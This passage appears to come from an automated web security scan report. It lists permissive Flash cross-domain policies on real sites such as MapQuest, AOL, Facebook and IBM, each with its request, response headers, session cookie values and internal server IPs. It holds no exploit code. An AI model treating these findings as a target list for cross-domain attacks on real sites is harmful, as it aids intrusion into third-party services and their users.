<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

3.4. http://www.mapquest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

3.5. http://xml.truveo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
    <site-control perm
...[SNIP]...

3.6. http://www.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

3.7. http://www.aolnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

3.8. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

3.9. http://www.blogsmithmedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

3.10. http://www.citysbest.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.11. http://www.dailyfinance.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

3.12. http://www.dooce.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

3.13. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.14. https://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.15. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

3.16. https://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.17. http://www.ibm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

3.18. http://www.marketwatch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

3.19. http://www.mmafighting.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

3.20. http://www.moviefone.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.21. http://www.netvibes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netvibes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

3.22. http://www.pageflakes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
